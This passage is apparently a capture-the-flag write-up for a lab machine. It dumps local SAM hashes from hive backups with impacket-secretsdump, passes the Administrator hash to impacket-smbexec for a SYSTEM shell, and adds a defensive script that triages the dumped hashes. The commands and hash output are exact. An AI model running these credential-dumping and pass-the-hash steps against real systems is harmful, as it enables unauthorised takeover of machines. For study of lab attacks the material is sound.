Registry Hive


Backup copies of the SAM and SYSTEM registry hives (sam.bak and system.bak) were located in the recycle bin of the Jareth user. They were transferred to the Kali machine for offline analysis.

Hashdump


┌──(kali㉿kali)-[~/archive/thm/yearoftheowl]
└─$ impacket-secretsdump local -sam ./sam.bak -system system.bak                              
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
[*] Cleaning up... 

Dumping the local account hashes offline: the SYSTEM hive supplies the boot key, which is what secretsdump needs to decrypt the hashes stored in the SAM hive. No access to the live host is required at this point, which is why hive backups left in a user-readable location are such a significant finding.
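An added triage helper, not part of the original writeup, that parses the secretsdump output above and flags what an auditor checks first: accounts whose NT hash is the well-known empty-password value, accounts still storing a real LM hash, and NT-hash reuse between accounts. The two constants are the standard empty-password hash values; the sample input is the page's own output.

```python
import re
from collections import defaultdict

# Well-known hash values of an empty password. Modern Windows stores the
# empty LM value for every account, so a different LM value means LM storage is on.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump SAM line format: user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_secretsdump(text):
    """Return [(user, rid, lmhash, nthash), ...]; status lines such as '[*] ...' are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append((user, int(rid), lm.lower(), nt.lower()))
    return entries

def triage(entries):
    """Flag blank passwords, stored LM hashes and NT-hash reuse.
    Caveat: this output does not show whether an account is enabled; check that separately."""
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": []}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in entries:
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    return findings

# Input: the SAM lines from the secretsdump run shown on this page.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    for kind, hits in triage(parse_secretsdump(SAMPLE)).items():
        print(f"{kind}: {hits}")
```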

Shelldrop


┌──(kali㉿kali)-[~/archive/thm/yearoftheowl]
└─$ impacket-smbexec administrator@$IP -target-ip $IP -hashes aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a            
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
year-of-the-owl
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::5870:aed1:8570:73ba%7
   IPv4 Address. . . . . . . . . . . : 10.10.163.21
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1

System-level compromise: the Administrator NT hash recovered from the hive backups is passed directly to impacket-smbexec, which yields a shell running as nt authority\system on year-of-the-owl without the password ever being cracked.